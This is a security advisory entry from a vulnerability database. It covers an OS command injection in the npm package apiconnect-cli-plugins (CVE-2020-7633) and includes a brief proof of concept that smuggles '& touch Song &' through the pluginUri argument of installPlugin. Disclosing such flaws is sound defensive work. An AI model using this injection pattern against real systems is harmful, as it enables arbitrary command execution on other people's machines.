Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
osvGoogleOSV:GHSA-C9M9-48PW-6MPV
HistoryMay 24, 2021 - 10:18 p.m.

apiconnect-cli-plugins vulnerable to OS Command Injection

2021-05-2422:18:13
Google
osv.dev
6
apiconnect-cli-plugins
os command injection
pluginuri
file lib/plugin-loader.js
function installplugin

AI Score

7.6

Confidence

High

EPSS

0.017

Percentile

88.0%

JSON

apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.

PoC

var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");

The injection point is located in line 181 of file lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).

Related

cve 1
cvelist 1
veracode 1
prion 1
github 1
nvd 1
cve
cve
CVE-2020-7633
2020-04-06 13:15:12
cvelist
cvelist
CVE-2020-7633
2020-04-06 12:24:12
veracode
veracode
OS Command Injection
2020-04-07 06:32:40
prion
prion
Command injection
2020-04-06 13:15:00
github
github
apiconnect-cli-plugins vulnerable to OS Command Injection
2021-05-24 22:18:13
nvd
nvd
CVE-2020-7633
2020-04-06 13:15:12

AI Score

7.6

Confidence

High

EPSS

0.017

Percentile

88.0%

JSON
Related for OSV:GHSA-C9M9-48PW-6MPV
cve1cvelist1veracode1prion1github1nvd1